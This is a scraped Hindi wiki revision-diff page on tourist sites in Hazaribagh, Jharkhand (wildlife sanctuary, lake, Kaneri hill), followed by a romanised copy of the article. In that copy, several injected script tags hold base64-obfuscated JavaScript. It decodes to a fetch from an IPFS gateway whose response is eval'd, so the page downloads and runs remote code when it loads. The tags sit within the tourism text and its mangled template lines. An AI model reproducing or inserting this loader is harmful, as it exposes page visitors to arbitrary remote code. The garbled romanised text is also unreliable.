Difference between revisions of "हज़ारीबाग़ पर्यटन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "हजार" to "हज़ार")
 
(9 intermediate revisions by 3 users not shown)
Line 5: Line 5:
 
|प्रवास= हज़ारीबाग़ प्रवास
 
|प्रवास= हज़ारीबाग़ प्रवास
 
}}
 
}}
{{tocright}}
+
[[चित्र:Hazaribag-National-Park.jpg|thumb|250px|[[हज़ारीबाग़ अभयारण्य]]<br /> Hazaribag National Park]]
खूबसूरत पर्यटक स्थलों से भरा हज़ारीबाग [[झारखंड]] में स्थित है। हज़ारीबाग का अर्थ होता है हज़ार बागों वाला और यह दो शब्दों हज़ार और बाग़ से मिलकर बना है। यहाँ पर 2019 फीट की ऊँचाई पर हैल्थ हिल रिसोर्ट का निर्माण किया गया है। यह रिसोर्ट प्रकृति की गोद में बसा हुआ है और बहुत खूबसूरत है। यहाँ पर कई पर्यटन स्थल है जो इस प्रकार है:-  
+
ख़ूबसूरत पर्यटक स्थलों से भरा हज़ारीबाग़ [[झारखंड]] में स्थित है। हज़ारीबाग़ का अर्थ होता है हज़ार बागों वाला और यह दो शब्दों हज़ार और बाग़ से मिलकर बना है। यहाँ पर 2019 फीट की ऊँचाई पर हैल्थ हिल रिसोर्ट का निर्माण किया गया है। यह रिसोर्ट प्रकृति की गोद में बसा हुआ है और बहुत ख़ूबसूरत है। यहाँ पर कई पर्यटन स्थल है जो इस प्रकार है:-  
 
==पर्यटन स्थल==
 
==पर्यटन स्थल==
 
====हज़ारीबाग़ अभयारण्य====
 
====हज़ारीबाग़ अभयारण्य====
 
{{main|हज़ारीबाग़ अभयारण्य}}
 
{{main|हज़ारीबाग़ अभयारण्य}}
 
*पूर्वोत्तर [[भारत]] के दक्षिण-पश्चिमी [[झारखंड]] राज्य में [[पटना]] - [[रांची]] मुख्य मार्ग पर [[हज़ारीबाग़]] नगर से 18 किमी दूर स्थित है।  
 
*पूर्वोत्तर [[भारत]] के दक्षिण-पश्चिमी [[झारखंड]] राज्य में [[पटना]] - [[रांची]] मुख्य मार्ग पर [[हज़ारीबाग़]] नगर से 18 किमी दूर स्थित है।  
*हज़ारीबाग़ अभयारण्य संरक्षित क्षेत्र है। हज़ारीबाग में पर्यटक वन्यजीव अभ्यारण्य की सैर कर सकते हैं।
+
*हज़ारीबाग़ अभयारण्य संरक्षित क्षेत्र है। हज़ारीबाग़ में पर्यटक वन्यजीव अभयारण्य की [[सैर]] कर सकते हैं।
*1955 में स्थापित यह अभयारण्य 186 वर्ग कि.मी. में फैला हुआ है। यह बहुत विशाल और खूबसूरत है।
+
*1955 में स्थापित यह अभयारण्य 186 वर्ग कि.मी. में फैला हुआ है। यह बहुत विशाल और ख़ूबसूरत है।
*अपनी खूबसूरती के लिए इसे पूरे विश्व में जाना जाता है।
+
*अपनी ख़ूबसूरती के लिए इसे पूरे विश्व में जाना जाता है।
 +
 
 
====हज़ारीबाग़ झील====
 
====हज़ारीबाग़ झील====
 
{{main|हज़ारीबाग़ झील}}
 
{{main|हज़ारीबाग़ झील}}
*अभ्यारण्य की सैर करने के बाद हज़ारीबाग़ झील की सैर की जा सकती है।  
+
*अभयारण्य की सैर करने के बाद हज़ारीबाग़ झील की सैर की जा सकती है।  
*झील के आस-पास का क्षेत्र भी काफी खूबसूरत है।  
+
*झील के आस-पास का क्षेत्र भी काफ़ी ख़ूबसूरत है।  
*पर्यटकों को यह झील बहुत पसंद आती हैं क्योंकि वह यहाँ पर शहर की भागती-दौड़ती जिंदगी से दूर बेहतरीन पिकनिक मना सकते हैं।   
+
*पर्यटकों को यह झील बहुत पसंद आती हैं क्योंकि वह यहाँ पर शहर की भागती-दौड़ती ज़िंदगी से दूर बेहतरीन पिकनिक मना सकते हैं।   
 
====कैनेरी पहाड़ी====
 
====कैनेरी पहाड़ी====
 
{{main|कैनेरी पहाड़ी हज़ारीबाग़}}
 
{{main|कैनेरी पहाड़ी हज़ारीबाग़}}
 
*हज़ारीबाग़ में अनेक पहाड़ियाँ हैं जिनमें कैनेरी पहाड़ी प्रमुख है।  
 
*हज़ारीबाग़ में अनेक पहाड़ियाँ हैं जिनमें कैनेरी पहाड़ी प्रमुख है।  
*इस पहाड़ी पर तीन झीलें भी हैं जो इसकी खूबसूरती में चार चाँद लगाती है।  
+
*इस पहाड़ी पर तीन झीलें भी हैं जो इसकी ख़ूबसूरती में चार चाँद लगाती है।  
====रजरप्पा====
+
{{प्रचार}}
{{main|रजरप्पा हज़ारीबाग़}}
 
*यह [[राँची]]-[[बोकारो]] मार्ग पर राँची से लगभग 68 किमी0 की दूरी पर स्थित है।
 
*यहाँ माँ छिन्नमस्तिका का मन्दिर है।
 
*इस स्थान की प्रसिद्धि विद्यापीठ के रूप में है।
 
*राजरप्पा स्थित सिद्धपीठ देश की 51 सिद्ध शक्तिपीठों में से एक है।
 
*यह स्थान [[दामोदर नदी|दामोदर]] और [[भैरवी नदी]] के संगम स्थल पर स्थित है।
 
 
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 39: Line 33:
 
}}
 
}}
  
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{झारखण्ड के पर्यटन स्थल}}
 
{{झारखण्ड के पर्यटन स्थल}}
 
[[Category:झारखण्ड]] [[Category:झारखण्ड के पर्यटन स्थल]] [[Category:हज़ारीबाग़ के पर्यटन स्थल]]  [[Category:पर्यटन कोश]]
 
[[Category:झारखण्ड]] [[Category:झारखण्ड के पर्यटन स्थल]] [[Category:हज़ारीबाग़ के पर्यटन स्थल]]  [[Category:पर्यटन कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 06:37, 16 November 2011

hazaribag hazaribag paryatan hazaribag zila

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

[[chitr:Hazaribag-National-Park.jpg|thumb|250px|hazaribag abhayarany
Hazaribag National Park]] khoobasoorat paryatak sthaloan se bhara hazaribag jharakhand mean sthit hai. hazaribag ka arth hota hai hazar bagoan vala aur yah do shabdoan hazar aur bag se milakar bana hai. yahaan par 2019 phit ki ooanchaee par hailth hil risort ka nirman kiya gaya hai. yah risort prakriti ki god mean basa hua hai aur bahut khoobasoorat hai. yahaan par kee paryatan sthal hai jo is prakar hai:-

paryatan sthal

hazaribag abhayarany

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  • poorvottar bharat ke dakshin-pashchimi jharakhand rajy mean patana - raanchi mukhy marg par hazaribag nagar se 18 kimi door sthit hai.
  • hazaribag abhayarany sanrakshit kshetr hai. hazaribag mean paryatak vanyajiv abhayarany ki sair kar sakate haian.
  • 1955 mean sthapit yah abhayarany 186 varg ki.mi. mean phaila hua hai. yah bahut vishal aur khoobasoorat hai.
  • apani khoobasoorati ke lie ise poore vishv mean jana jata hai.

hazaribag jhil

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  • abhayarany ki sair karane ke bad hazaribag jhil ki sair ki ja sakati hai.
  • jhil ke as-pas ka kshetr bhi kafi khoobasoorat hai.
  • paryatakoan ko yah jhil bahut pasand ati haian kyoanki vah yahaan par shahar ki bhagati-dau dati ziandagi se door behatarin pikanik mana sakate haian.

kaineri paha di

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  • hazaribag mean anek paha diyaan haian jinamean kaineri paha di pramukh hai.
  • is paha di par tin jhilean bhi haian jo isaki khoobasoorati mean char chaand lagati hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>